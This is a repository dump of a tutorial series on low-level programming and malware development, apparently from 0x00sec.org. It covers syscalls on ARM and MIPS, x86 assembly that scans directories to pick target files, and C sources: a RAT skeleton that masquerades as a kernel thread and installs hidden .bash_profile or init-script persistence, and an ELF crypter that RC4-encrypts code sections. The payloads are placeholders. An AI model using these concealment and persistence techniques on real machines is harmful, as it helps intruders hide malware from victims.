├── code
    ├── 11
    │   └── rat0x0-04.c
    ├── 12
    │   └── rat0x0-05.c
    └── 13
    │   └── crypter-1.0.c
├── README.md
├── part-02.5.md
├── part-10.md
├── part-11.md
├── part-02.md
├── part-01.md
├── part-08.md
├── part-03.md
└── part-07.md


/code/11/rat0x0-04.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <unistd.h>
 3 | #include <string.h>
 4 | 
 5 | int main (int argc, char *argv[]) {
 6 |   pid_t pid;
 7 |   printf ("This is RAT0X0 version 0.1\n");
 8 | 
 9 |   strcpy (argv[0],"[Jbd2/sda0-8]");
10 |   if ((pid = fork()) != 0) return 0;
11 |   setsid(); // Remove TTY
12 |   if ((pid = fork()) != 0) return 0;
13 | 
14 |   while (1) usleep (1000);
15 | }
16 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | **Note that this repository has been archived. Thanks for your interest**
 2 | # Programming course for Wannabes
 3 | This repo contains the _Programming for Wannabes_ series originally published in 0x00sec.org. I'm just putting this all together to be able to see everything at once.
 4 | 
 5 | 
 6 | 
 7 | 
 8 | * [Programming for Wannabes. Part I. Your first Program](part-01.md)
 9 | 
10 |   Computer architecture introduction. Machine Code introduction. How C relates to asm.
11 | 
12 | * [Programming for Wannabes. Part II. Systemcalls](part-02.md)
13 | 
14 |   Syscall introduction. Using syscalls from C and asm. Stripping down binaries (removing standard libs)
15 | 
16 | * [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md)
17 | 
18 |   Part II for ARM and MIPS
19 | 
20 | * [Programming for Wannabes. Part III. Your first Shell Code](part-03.md)
21 | 
22 |   Processor Native Word Size. HW Memory Models. Pointers. Convert Hello World into a shellcode
23 | 
24 | * [Programming for Wannabes. Part IV. The Stack](part-04.md)
25 | 
26 |   Stacks. Function parameters, prologue and epilogue. Stack Frame. Local variables. Buffer overflows and Canaries concepts
27 | 
28 | * [Programming for Wannabes. Part V. A Dropper](part-05.md)
29 | 
30 |   Writing a dropper (TCP client). Optimize for size. Dropping the dropper hijacking existing raw shell TCP connection (using `ptrace`)
31 | 
32 | * [ Programming for Wannabes Part VI. Malware Introduction](part-06.md)
33 | 
34 |   General introduction to malware. We start writing a generic skeleton to code any kind of malware
35 | 
36 | * [ Programming for Wannabes Part VII. Finding Files I](part-07.md)
37 | 
38 |    How to navigate directories to search for specific files
39 | 
40 | * [ Programming for Wannabes Part VIII. Files Details](part-08.md)
41 | 
42 |   Using stat to get information about files and navigate recursively directories trees
43 | 
44 | * [ Programming for Wannabes Part IX. Finding Files in asm](part-09.md)
45 | 
46 |   Recoding part VII but this time in assembler
47 | 
48 | * [ Programming for Wannabes Part X. File Details in asm](part-10.md)
49 | 
50 |   Recoding part VIII but this time in assembler
51 | 
52 | * [ Programming for Wannabes Part XI. Introduction to RATs](part-11.md)
53 | 
54 |   Let's get started coding Remote Access Trojans. How to disguise RATs on sight
55 | 
56 | 
57 | * [ Programming for Wannabes Part XII. Persistence](part-12.md)
58 | 
59 |   Adding persistence to our RAT
60 | 
61 | * [ Programming for Wannabes Part XIII. Crypters Part I](part-13.md)
62 | 
63 |  Everything about crypters. Part I, RC4 algorithm and introduction to ELF format
64 | 


--------------------------------------------------------------------------------
/code/13/crypter-1.0.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | 
 5 | #include <unistd.h>
 6 | #include <fcntl.h>
 7 | #include <sys/stat.h>
 8 | #include <sys/mman.h>
 9 | 
10 | #include <elf.h>
11 | 
/* Report the failing call through perror() and terminate with status 1.
 * Wrapped in do/while(0) so it behaves as a single statement. */
#define DIE(s) do { perror (s); exit (1); } while (0)
/* Exchange two unsigned char lvalues. A temporary is used on purpose: the
 * add/subtract trick zeroes the value when both arguments designate the
 * same object (S[i] and S[j] with i == j). */
#define SWAP(a,b) do { unsigned char swap_tmp_ = (a); (a) = (b); (b) = swap_tmp_; } while (0)

/*
 * RC4-encode (or decode, the operation is symmetric) a buffer in place.
 *
 *   msg, mlen : buffer to transform and its length in bytes
 *   key, klen : key bytes and key length (must be > 0)
 *
 * Prints " [<n> bytes encoded]" on stdout after processing.
 * Returns 0 on success, -1 if the key is missing/empty or msg is NULL
 * while mlen > 0 (nothing is modified or printed in that case).
 */
int rc4 (unsigned char *msg, int mlen, unsigned char *key, int klen) {
  int           i, j, cnt;
  unsigned char S[256]; // Permutation matrix

  if (key == NULL || klen <= 0) return -1;   // key[i % klen] needs klen > 0
  if (msg == NULL && mlen > 0) return -1;

  // KSA: Key-Scheduling Algorithm
  // Start from the identity permutation; all 256 entries must be set.
  for (i = 0; i < 256; i++) S[i] = (unsigned char) i;
  for (j = 0, i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % klen]) % 256;
    SWAP (S[i], S[j]);
  }

  // Encoding: XOR every message byte with the next keystream byte
  i = j = 0;
  for (cnt = 0; cnt < mlen; cnt++) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;

    SWAP (S[i], S[j]);

    msg[cnt] ^= S[(S[i] + S[j]) % 256];
  }
  printf (" [%d bytes encoded]", cnt);
  return 0;
}
40 | 
/*
 * crypter <binary>
 *
 * Maps the 64-bit ELF file named on the command line read/write, prints
 * its section table and RC4-encodes the bytes of the `.text` and `.rodata`
 * sections in place with a fixed key. No stub is injected here (see the
 * marker comment near the end), so this program only transforms the file.
 *
 * Exits with 0 on success, 1 on an I/O error or a malformed file, and
 * exit(-1) on wrong usage.
 */
int main (int argc, char *argv[]) {

  if (argc != 2) {
    fprintf (stderr, "Invalid number of parameters\n");
    fprintf (stderr, "Usage: crypter binary\n");
    exit (-1);
  }
  // Open file
  int fd;
  if ((fd = open (argv[1], O_RDWR, 0)) < 0) DIE ("open");
  // get size
  struct stat st;
  if (fstat (fd, &st) < 0) DIE ("fstat");
  if (st.st_size < (off_t) sizeof (Elf64_Ehdr)) {
    fprintf (stderr, "%s: too small to be an ELF file\n", argv[1]);
    exit (1);
  }
  size_t fsize = (size_t) st.st_size;
  // Map file
  unsigned char *p = mmap (0, fsize, PROT_READ | PROT_WRITE,
                           MAP_SHARED, fd, 0);
  if (p == MAP_FAILED) DIE ("mmap");

  // Sanity checks: only 64-bit ELF files are understood below
  Elf64_Ehdr *elf_hdr = (Elf64_Ehdr*) p;
  if (memcmp (elf_hdr->e_ident, ELFMAG, SELFMAG) != 0 ||
      elf_hdr->e_ident[EI_CLASS] != ELFCLASS64) {
    fprintf (stderr, "%s: not a 64-bit ELF file\n", argv[1]);
    exit (1);
  }
  printf ("Section Table located at : %lu\n", (unsigned long) elf_hdr->e_shoff);
  printf ("Section Table entry size : %d\n",  elf_hdr->e_shentsize);
  printf ("Section Table entries    : %d\n",  elf_hdr->e_shnum);

  // The whole section header table must lie inside the mapping
  Elf64_Xword sh_bytes = (Elf64_Xword) elf_hdr->e_shnum * sizeof (Elf64_Shdr);
  if (elf_hdr->e_shentsize != sizeof (Elf64_Shdr) ||
      elf_hdr->e_shoff > fsize ||
      sh_bytes > fsize - elf_hdr->e_shoff ||
      elf_hdr->e_shstrndx >= elf_hdr->e_shnum) {
    fprintf (stderr, "%s: missing or corrupt section table\n", argv[1]);
    exit (1);
  }

  int           i;
  Elf64_Shdr    *sh = (Elf64_Shdr*)(p + elf_hdr->e_shoff);
  Elf64_Shdr    *strtab = &sh[elf_hdr->e_shstrndx];

  // Section names are read with %s/strcmp: the name table must be inside
  // the file and NUL-terminated.
  if (strtab->sh_size == 0 ||
      strtab->sh_offset > fsize ||
      strtab->sh_size > fsize - strtab->sh_offset ||
      p[strtab->sh_offset + strtab->sh_size - 1] != '\0') {
    fprintf (stderr, "%s: corrupt section name table\n", argv[1]);
    exit (1);
  }
  const char *s_name = (const char *) p + strtab->sh_offset;

  const char *key = "0x00Sec!\0";  // Use 8 characters to make asm simpler.
  const char *name = NULL;
  // rc4() takes an int length: largest value it can accept (INT_MAX)
  const Elf64_Xword max_len = ((unsigned int) -1) >> 1;

  for (i = 0; i < elf_hdr->e_shnum; i++) {
    // An out-of-range name offset is shown as an empty name
    name = (sh[i].sh_name < strtab->sh_size) ? s_name + sh[i].sh_name : "";
    printf ("Section %02d [%20s]: Type: %d Flags: %lx | Off: %lx Size: %lx => ",
            i, name,
            (int) sh[i].sh_type, (unsigned long) sh[i].sh_flags,
            (unsigned long) sh[i].sh_offset, (unsigned long) sh[i].sh_size);
    //Find `.text` and `.rodata`
    if (!strcmp (name, ".text") || !strcmp (name, ".rodata")) {
      // Only touch bytes that really exist in the mapped file
      if (sh[i].sh_type == SHT_NOBITS ||
          sh[i].sh_offset > fsize ||
          sh[i].sh_size > fsize - sh[i].sh_offset ||
          sh[i].sh_size > max_len) {
        printf (" - Skipped (section data out of range)\n");
        continue;
      }
      // encrypt section
      rc4 (p + sh[i].sh_offset, (int) sh[i].sh_size,
           (unsigned char*) key, (int) strlen (key));
      printf (" - Crypter!\n");
    } else printf ("\n");
  }

  // Inject stub here
  if (munmap (p, fsize) < 0) DIE ("munmap");
  if (close (fd) < 0) DIE ("close");
  return 0;
}
95 | 


--------------------------------------------------------------------------------
/code/12/rat0x0-05.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <unistd.h>
  3 | #include <string.h>
  4 | 
  5 | #include <sys/types.h>
  6 | #include <sys/stat.h>
  7 | #include <fcntl.h>
  8 | 
  9 | 
 10 | int go_to_hell () {
 11 |   pid_t pid;
 12 |   
 13 |   if ((pid = fork()) != 0) return 0;
 14 |   setsid(); // Remove TTY
 15 |   if ((pid = fork()) != 0) return 0;
 16 |   
 17 |   return 0;
 18 | }
 19 | 
 20 | #define USER_PERSISTENCE 0
 21 | #define SYS_PERSISTENCE 1
 22 | 
 23 | 
 24 | int escalate () {
 25 |   if (getuid () == 0) return SYS_PERSISTENCE;
 26 | #if 0
 27 |   extract_info ();
 28 |   if (find_exploit ()) {
 29 |     apply_exploit (); // This will actually run the RAT
 30 | 	exit (1);         // so we are done
 31 |   }
 32 | #endif
 33 |   return USER_PERSISTENCE;
 34 | }
 35 | 
 36 | int append_str (char *fname, char *str) {
 37 |   int fd = open (fname, O_APPEND | O_WRONLY);
 38 |   if (fd < 0) perror ("open:");
 39 |   if (write (fd, str, strlen (str)) < 0) perror ("write:");
 40 |   close (fd);
 41 | }
 42 | int check_update1 (char *fname) {
 43 |   unsigned char buffer [1024];
 44 |   int i, fd = open (fname, O_RDONLY);
 45 |   do {
 46 |     int len = read (fd, buffer, 1024);
 47 |     for (i = 0; i < len; i++)
 48 |       if (buffer[i] == '\010') {
 49 | 	printf ("File %s already infected\n", fname);
 50 | 	return 0;
 51 |       }
 52 | 	
 53 |     if (len == 0) break;
 54 |   } while (1);
 55 |   close (fd);
 56 |   return 1;
 57 | }
 58 | unsigned char is_updated (char *fname) {
 59 |   unsigned char buffer, res = 1;
 60 |   int fd = open (fname, O_RDONLY);
 61 |   do {
 62 |        int len = read (fd, &buffer, 1);
 63 |        if (len <= 0) break;
 64 |        if (buffer == '\010') {
 65 | 	     printf ("- File %s already infected\n", fname);
 66 | 		 res = 0;
 67 | 	     break;
 68 |        }
 69 |      } while (1);
 70 |   close (fd);
 71 |   return res;
 72 | }
 73 | 
 74 | 
 75 | int persistence_user () {
 76 |   printf ("Applying User Persistence\n");
 77 |   // apply user persistence
 78 |   if (is_updated ("./.bash_profile"))
 79 |     {
 80 |       append_str ("./.bash_profile", "echo \"I am some harmless malware\"\n");
 81 |       append_str ("./.bash_profile", "#\033[1A\033[2K\033[1A\n");
 82 |       append_str ("./.bash_profile", "PATH=$HOME/bin:$PATH\n");
 83 |       append_str ("./.bash_profile", "#\033[2K\033[1A\033[2K\010");
 84 |     }
 85 |   return 0;
 86 | }
 87 | 
 88 | int create_from_str (char *fname, int runlevel, char *str) {
 89 |   char target[1024] = "./rcX.d/S99malware";
 90 |   int fd = open (fname, O_CREAT | O_WRONLY, 0777);
 91 |   if (fd < 0) perror ("open:");
 92 |   if (write (fd, str, strlen (str)) < 0) perror ("write:");
 93 |   close (fd);
 94 |   target[4] = '0' + runlevel;
 95 |   symlink (fname, target);
 96 | }
 97 | 
 98 | char script[] =
 99 |   "#!/bin/bash\n"
100 |   "echo \"I'm malware\"\n"
101 |   "# Doing bad things here";
102 | 
103 | int persistence_root () {
104 |   printf ("Applying System Persistence\n");
105 |   create_from_str ("./init.d/malware", 3, script);
106 |   // apply root persistence
107 |   return 0;
108 | }
109 | 
/*
 * Alternative system-level variant: builds "<current directory>/rat0x0-05",
 * creates the symbolic link ./rc3.d/S99rat0x0 pointing at it and prints the
 * built path.
 *
 * Returns 0 on success, -1 when the current directory cannot be obtained
 * or the link cannot be created (a diagnostic is printed with perror).
 */
int persistence_root1 () {
  static const char suffix[] = "/rat0x0-05";
  char cwd[1024];
  char buffer[sizeof cwd + sizeof suffix];  // always large enough: no truncation
  int  rc = 0;

  printf ("Applying System Persistence\n");

  // Without this check a failed getcwd() leaves the buffer uninitialised
  if (getcwd (cwd, sizeof cwd) == NULL) {
    perror ("getcwd");
    return -1;
  }
  snprintf (buffer, sizeof buffer, "%s%s", cwd, suffix);

  if (symlink (buffer, "./rc3.d/S99rat0x0") < 0) {
    perror ("symlink");
    rc = -1;
  }
  printf ("%s\n", buffer);
  return rc;
}
119 | 
/*
 * Placeholder main loop: sleeps 1000 microseconds per iteration, forever.
 * The function never returns.
 */
int payload () {
  for (;;) {
    // C2C communication loop
    usleep (1000);
  }
}
126 | 
127 | int main (int argc, char *argv[]) {
128 |   int (*persistence[2])() = {persistence_user, persistence_root1};
129 | 
130 |   printf ("This is RAT0X0 version 0.2\n");
131 |   // go_to_hell ();
132 |   strcpy (argv[0],"[Jbd2/sda0-8]");
133 |   persistence [escalate ()]();
134 |   payload ();
135 | }
136 | 


--------------------------------------------------------------------------------
/part-02.5.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes. Part II and a Half
  2 | 
  3 | If you had read [Part II](part-02.md) of this series you may have missed a couple of details. Consider this post as a short addendum to Part II including those details. 
  4 | 
  5 | 
  6 | The first thing you may have noticed is that there was no ARM or MIPS code in there. Actually, the paper was already quite long and, to be honest, I thought it should be straightforward to repeat what we did for the x86 with any of those processors. However, I tried myself for the Lulz and I found some glitches that may be useful to mention.
  7 | 
  8 | So let's go with ARM
  9 | 
 10 | # ARM system calls
 11 | Calling a system call on ARM is, conceptually, done in the same way as on Intel processors. You have to set a specific register with the number of the system call you want to invoke and then get into kernel mode.
 12 | 
 13 | ARM defines 16 registers, named from `r0` to `r15`. The last 3 (`r13`, `r14` and `r15`) have special names (`sp`, `lr` and `pc`) and special functions; we will go into the details later in this course. For the time being we will only use the general purpose registers (those `r0` to `r12`).
 14 | 
 15 | So, the system call number goes into `r7`... yes, there is a reason, but it does not really matter now. Then the additional parameters needed by the system call go into registers `r0` to `r5`.
 16 | 
 17 | With all this information and, taking into consideration that system calls follow the same numbering as on 32-bit Intel, we can write our exit function like this:
 18 | 
 19 | ```nasm
 20 | .text
 21 | .globl _exit
 22 | 
 23 | _exit: mov r7, #1
 24 |        swi #0
 25 | 
 26 | ```
 27 | 
 28 | As it happened with the Intel processor, the kernel follows the default processor C ABI. This means that when you call a C function, the first parameter goes into `r0` and when you call a system call the first argument also goes in `r0`. That's why we do not have to do anything to capture the parameter we pass to the `_exit` function from C.
 29 | 
 30 | I will reproduce the C code again, in here for your convenience:
 31 | 
 32 | ```C
 33 | #include <unistd.h>
 34 | 
 35 | int _start (void)
 36 | {
 37 |   int a = 10;
 38 |   int b = 20;
 39 | 
 40 |   a = a + b;
 41 |   _exit (a);
 42 | }
 43 | 
 44 | ```
 45 | 
 46 | Now, we can proceed as we did with Intel, but we have to be aware that... `gcc` generates ARM 32bits opcodes and `as`, the assembler, generates Thumb opcodes... at least that was what happened with my `gcc` and `as`. Thumb is 16bits long and... well you cannot just mix 16bits and 32bits opcodes directly. So there are two options to solve this problem.
 47 | 
 48 | * **Option 1**. Force 32bits passing the compiler the `-marm` flag
 49 | * **Option 2**. Mark the assembler code as a Thumb function, using the `.thumb_func` directive before the declaration of your function.
 50 | 
 51 | I tried both, but in this paper, let's use option 1... I haven't checked all the details for option 2 so I may be saying something stupid :P
 52 | 
 53 | ```
 54 | arm-linux-gnueabi-gcc -static -fPIC -nostartfiles -nodefaultlibs -nostdlib -marm -o c2-3-arm c2-2.c exit_func-arm1.s
 55 | ```
 56 | 
 57 | As you can imagine `exit_func-arm1` is the assembly code for option 1. The one we showed above.
 58 | 
 59 | Now you can test your program in your Android Phone or in any other ARM machine (BeagleBone Black, BananaPi, Olinuxino, RaspberryPi,...)... To check it in your phone take a look to this paper ([Improving your Android Shell](https://0x00sec.org/t/improving-your-android-shell/886) ).
 60 | 
 61 | # MIPS system calls
 62 | With MIPS I had a quite tough time. The toolchain for my test router used an old version of binutils and that caused me a lot of problems.
 63 | 
 64 | The first one was that I couldn't use the names of the registers but their numbers. MIPS registers are named in a more complex way:
 65 | 
 66 | 
 67 |     $0	      	$zero	        Hard-wired to 0
 68 |     $1		$at		Reserved for pseudo-instructions
 69 |     $2  - $3	$v0, $v1	Return values from functions
 70 |     $4  - $7	$a0 - $a3	Arguments to functions - not preserved by subprograms
 71 |     $8  - $15	$t0 - $t7	Temporary data, not preserved by subprograms
 72 |     $16 - $23	$s0 - $s7	Saved registers, preserved by subprograms
 73 |     $24 - $25	$t8 - $t9	More temporary registers, not preserved by subprograms
 74 |     $26 - $27	$k0 - $k1	Reserved for kernel. Do not use.
 75 |     $28		$gp		Global Area Pointer (base of global data segment)
 76 |     $29		$sp		Stack Pointer
 77 |     $30		$fp		Frame Pointer
 78 |     $31		$ra		Return Address
 79 | 
 80 | (taken from http://www.cs.uwm.edu/classes/cs315/Bacon/Lecture/HTML/ch05s03.html)
 81 | 
 82 | We can see again how the last registers are used for special purposes. As I said, we will come to this in a future instalment. For now, we will just use `$v` and `$a` registers.
 83 | 
 84 | So, how do we invoke a system call on a MIPS processor?. Again, we have to put the system call in a register and go into kernel mode. The register for the system call is `$v0` or `$2` and the instruction to go into kernel mode is `syscall`.
 85 | 
 86 | In my case I found the syscall number, disassembling one of my test programs. Then I found that, at least for `SYS_exit`, this page seems to have the right numbers ( https://w3challs.com/syscalls/?arch=mips_o32 ).
 87 | 
 88 | If I told you that parameters, as stated in the table above, goes into `$aX`, then you should be able to write your exit function... something like this:
 89 | 
 90 | ```nasm
 91 | .globl _exit
 92 | .text
 93 | 	
 94 | _exit:  li $2, 4001
 95 | 	syscall
 96 | ```
 97 | 
 98 | Let's go with the glitches I mentioned at the beginning. The first one is that... at least for my toolchain, the first function getting executed is `__start` instead of `_start`. It took me a while to realize that (even when the linker was complaining), those two underscores are difficult to see when it is late night. Therefore, we need to change our C code and change the name of our function from `_start` to `__start`.
 99 | 
100 | The second one was really frustrating, and I haven't completely understood what the problem is. Apparently, for some reason that I do not know, my toolchain cannot compile static binaries. Any attempt to do that will produce a binary that crashes on my router. I have to do some experimentation, but for the time being this is a mystery.
101 | 
102 | So, for MIPS, at least for me, I couldn't go as far as I went for Intel and ARM. The `exit` function gets substituted by our minimal system call (actually I changed the name to something not in libc and the function got called properly). However, I didn't manage to get completely rid of the libc.
103 | 
104 | `$ mips-linux-uclibc-gcc -nostartfiles -o c2-2-mips c2-2-mips.c exit_func_mips.s`
105 | 
106 | Even so, it doesn't look like there is any libc dependency. `nm` only shows an undefined symbol:
107 | 
108 | ```
109 | $ nm n
110 | 00440414 A __bss_start
111 | 00400120 r _DYNAMIC
112 | 00440414 A _edata
113 | 00440414 A _end
114 | 004003c0 T _exit
115 | 00440414 A _fbss
116 | 004403e0 A _fdata
117 | 00400360 T _ftext
118 | 004403f0 A _GLOBAL_OFFSET_TABLE_
119 | 004483e0 A _gp
120 |          U _gp_disp
121 | 004403e0 D __RLD_MAP
122 | 00400360 T __start
123 | ```
124 | 
125 | Anyway, I have found that this stuff becomes tricky with routers, specially if you do not have a toolchain that actually matches your router and also that, many of them run old and very stripped down version of linux that imposes additional constraints in the code.
126 | 
127 | Let's finish with some numbers as we did with intel:
128 | 
129 |     c2-3-arm  320 bytes  (ARM version)
130 |     c2-2-mips 1.8 Kbytes (MIPS version)
131 | 
132 | These values are after `stripping` the binaries. Not bad...
133 | 
134 | Well, this is it for ARM and MIPS... at least for me and for now :slight_smile: 
135 | 
136 | # Conclusions
137 | We have done a short journey from the C realm to the kernel border and we have found quite a lot of stuff in between. It is interesting to understand all this... it changes a bit the way you see the programs running in your computer. We use to think that a C program is pretty low level and it is very fast and optimized. We have seen a bit of what it goes into a C program... now, just think about what is in there when using a scripting language... _So many CPU cycles_....
138 | 
139 | In next part we will come back to general programming... maybe...
140 | 
141 | * PREVIOUS: [Programming for Wannabes. Part II. Systemcalls](part-02.md)
142 | * NEXT: [Programming for Wannabes. Part III. Your first Shell Code](part-03.md)
143 | 


--------------------------------------------------------------------------------
/part-10.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes X. File details in asm
  2 | We already have code to scan a single folder and in this instalment we are going to extend it to scan complete folder trees and also get the details from the files so our malware can decide which file is interesting or not.
  3 | 
  4 | This is going to be pretty short as we already know everything needed to implement this extension.
  5 | 
  6 | # Refresher.... the code so far
  7 | In the previous instalment, towards the end I mentioned that using an ascending loop will have some benefits in this specific case so, I will include this modification in the base code.
  8 | 
  9 | You can check it as an exercise. It does exactly the same as the previous version, but counts from zero to the number of bytes returned by `getdents`, instead of decreasing that value until we get to zero.
 10 | 
 11 | This is the code.
 12 | 
 13 | ```nasm
 14 | 	global mfw_select_target
 15 | 	extern mfw_puts
 16 | 	extern mfw_putln
 17 | 	extern mfw_openat
 18 | 	extern mfw_newfstatat
 19 | 	extern mfw_getdents
 20 | 	extern mfw_close
 21 | 
 22 | 	section .text
 23 | 	
 24 | mfw_select_target:
 25 | 	BUF_SIZE  EQU     0x400
 26 | 	STAT_SIZE EQU     0x144
 27 |   	FD	  EQU     0x08
 28 |  	BUF       EQU     (FD   + BUF_SIZE)
 29 | 	ST        EQU     (BUF + STAT_SIZE)
 30 | 	STE       EQU     BUF
 31 | 	D_NAME    EQU     0x12
 32 | 	D_RECLEN  EQU     0x10
 33 | 	ST_MODE   EQU     0x18
 34 | 	
 35 | 	;; Create Stack Frame
 36 | 	push  rbp
 37 | 	mov   rbp, rsp
 38 | 	sub   rsp, STE
 39 | 	
 40 | 	;; Open Directory
 41 | 	;; RDI and RSI should be all set
 42 | 	mov  rdx, 0q200000 	;O_RDONLY | O_DIRECTORY
 43 | 	call mfw_openat
 44 | 	test al,al
 45 | 	js   done1		; Exit if we cannot open the folder. Likely permission denied error
 46 | 	
 47 | 	mov  QWORD [rbp-FD], rax ;Store fd in local var
 48 | loop0:
 49 | 	mov  rdi, QWORD [rbp-FD]
 50 | 	lea  rsi, [rbp-BUF]
 51 | 	mov  rdx, BUF_SIZE
 52 | 	call mfw_getdents
 53 | 	
 54 | 	test ax,ax
 55 | 	jz   done		    ; 0 means we are done reading the folder
 56 | 	js   loop0 		    ; <0 means error.... we just try again
 57 | 
 58 | 	mov r9, rax		    ; Loop limit
 59 | 	lea r8, [rbp-BUF] 	; Points to struct linux_dirent record
 60 | 	xor r14,r14 		; Loop counter = 0
 61 | 
 62 | loop1:
 63 | 	lea   rdi, [r8 + r14  + D_NAME] ; Offset to current dirent name
 64 | 
 65 | ;; ***********************************************
 66 | ;; All new code goes here
 67 | ;; *****************************************************
 68 | 	;;  For the time being just print file name
 69 | 	mov  rdi, rsi
 70 | 	call mfw_putln
 71 | 
 72 | next:
 73 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov
 74 | 	add r14,rdx
 75 | 	cmp r14, r9
 76 | 	jge loop0                ; If it is zero, get more data
 77 | 	jmp loop1
 78 | 	
 79 | done:	
 80 | 	;; Close directory
 81 | 	mov rdi, QWORD [rbp-FD]
 82 | 	call mfw_close
 83 | done1:	
 84 | 	leave     		; Set RSP=RBP and pops RBP
 85 | 	ret
 86 | 
 87 | ```
 88 | 
 89 | Before continuing, you may have noticed the use of the `movzx` instruction. This is new and we haven't talked about it before. This instruction and also its counterpart `movsx` allow us to load a value that is smaller than the target register. Let's check the instruction
 90 | 
 91 | ```nasm
 92 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN]
 93 | ```
 94 | 
 95 | In this case we are moving a memory word (16 bits) into a 64 bits register. The `movZx` instruction will complete the target with zeros while the `movSx` will extend the sign. In this example, the value we want is 2 bytes, but we want to use it on the 64bits register for the arithmetic operations (actually the `edx` will likely be enough, but we would have to use the instruction in any case).
 96 | 
 97 | The difference between this instruction and a single move is that the last will not update the higher word on the register, and we should set the register to zero before copying only the lower 16bits. 
 98 | 
 99 | In the same way, if we are dealing with negative numbers...
100 | 
101 | # Negative numbers
102 | So far we haven't cared much about negative numbers... in a sense, we kind of magically assumed that they just work as it happens on C or any other high level language, however, there are a few things we need to know about number representation and its associated arithmetic.
103 | 
104 | Let's start thinking on a single byte (8 bits or 8 ones or zeros). As we know with 8 bits we can represent 256 values (from 0 to 255). That's perfect for natural numbers, but what happens if we need negative numbers?... And we need them, I can already tell you that.
105 | 
106 | Well, in that case we need to encode the number differently. First thing is to store the sign of the number, and, that will take a bit.... I mean, it cannot take less... at least not without over-complicating the solution. Then if 1 bit is reserved for the sign, we have 7 bits to represent the actual number and that is 128 values. let's print a few of those numbers
107 | 
108 |     8 => 0 000 1000        -8 => 1 000 1000
109 | 	7 => 0 000 0111        -7 => 1 000 0111
110 | 	....
111 | 	1 => 0 000 0001        -1 => 1 000 0001
112 | 	0 => 0 000 0000         0 => 1 000 0000
113 | 	
114 | So, we see a few problems with this representation. The first one is that we have two representations for the number zero. That is not convenient as it can make computations ambiguous and we are also losing the opportunity to represent one extra number.
115 | 
116 | The second problem of this representation is that multiplication is kind of easy, but addition is kind of a hell. 
117 | 
118 | Fortunately for us, some smart people long ago came up with a better representation for the negative numbers....
119 | 
120 | # 2-complements
121 | This representation of the numbers also uses the most significant bit to indicate the sign, but the value of the number is encoded in a smarter way. Let's see our table of numbers again and then let's explore the benefits of this representation:
122 | 
123 |     8 => 0 000 1000        -8 => 1 111 1000
124 | 	7 => 0 000 0111        -7 => 1 111 1001
125 | 	....
126 | 	2 => 0 000 0010        -2 => 1 111 1110
127 | 	1 => 0 000 0001        -1 => 1 111 1111
128 | 	0 => 0 000 0000         
129 | 
130 | As we can see now there is one single representation for zero, that is actually zero (all bits zero). This has a consequence... zero is somehow a positive number, because the most significant bit is 0 (that is our sign bit). This is why a signed char can take values from -128 to 127 (because the zero is part of the positives)
131 | 
132 | In addition to the sign, the rest of the number is constructed counting upward as usual for the positive numbers, and backwards for the negative ones... 
133 | 
134 | Actually the way to change the sign of a number, or if you prefer, calculate  the two's complement is as follows:
135 | 
136 | * Invert all bits in the number (this is the so called one's complement)
137 | * Add 1
138 | 
139 | Let's use as example the number 5 and let's calculate the two's complement of it, or in other words, let's determine the bit representation of -5. 
140 | 
141 |     Number 5   ->  00000101
142 |     NOT(5)     ->  11111010
143 | 	NOT(5) + 1 ->  11111011
144 | 	
145 | The other big advantage of this representation is that basic arithmetic operations will just work. Just add the 5 and -5 above and it will result in zero. Subtraction and multiplication also work out of the box. I won't go further into this topic. The interested reader shall read the [Wikipedia page](https://en.wikipedia.org/wiki/Two%27s_complement#Converting_to_two's_complement_representation), and if you are really into maths and scientific SW you also need to read [this](https://www.itu.dk/~sestoft/bachelor/IEEE754_article.pdf).
146 | 
147 | # Back to `movsx`
148 | So, now that we know how a negative number is represented we can come back to the `movSx` where `S` stands for _sign_. This instruction works the same as `movzx` but performing what is known as sign extension.
149 | 
150 | Sign extension happens when copying some value of a specific datatype into another value but of a bigger datatype. Imagine you want to copy the value 7 in a byte in memory, into the 32 bits register `EDX`.
151 | 
152 |     EDX                                     Memory Byte
153 | 	XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX     00000111
154 | 	                                           |  (mov edx, BYTE [mem]
155 |     XXXXXXXX XXXXXXXX XXXXXXXX 00000111 <------+
156 | 	
157 | In the diagram above `X` means any value. It may be zero or one. When we move the byte into `EDX` we will just update the less significant byte... Anything else in the register will remain. However, when we use `movzx` we are forcing zeros in all the other bits in the register.... and when using `movsx` we are forcing the sign bit. Let's change the byte memory to some negative value
158 | 
159 |     EDX                                     Memory Byte
160 | 	XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX     11111110  (-2)
161 | 	                                           |  (movzx edx, BYTE [mem]
162 |     00000000 00000000 00000000 11111110 <------+
163 | 	                                           |  (movsx edx, BYTE [mem]
164 |     11111111 11111111 11111111 11111110 <------+
165 | 
166 | In the first case we copy the byte in the lower part of the register (actually `dl`) and then we set everything else to 0. In the second case we set everything else to the sign bit. This way, the result of the first case is 254 while in the second case it is still -2.
167 | 
168 | # Calling `statat`
169 | Now we can just write the loop to call `statat` and check the file type. Let's split this in two parts. First the call to `statat` and then the check of the file.
170 | 
171 | The first part is pretty straight forward:
172 | 
173 | ```nasm
174 | 
175 | loop1:
176 | 	lea   rdi, [r8 + r14  + D_NAME] ; Offset to current dirent name
177 | 	
178 | 	;; Skip . and .. names
179 | 	;; ---------------------------
180 | 	cmp WORD [rdi], 0x002e
181 | 	je next
182 | 	cmp WORD [rdi], 0x2e2e
183 | 	jne check_file
184 | 	cmp BYTE [rdi+2], 0
185 | 	je next
186 | 	
187 | 	;; Check file type and permissions
188 | check_file:	
189 | 	lea    rsi, [rdi]	; Par2 : name
190 | 	mov    rdi, [RBP - FD]  ; Par1 : fd
191 | 	lea    rdx, [RBP - ST]  ; Par3 : struct stat
192 | 	xor    rcx, rcx		; Par4 : flags
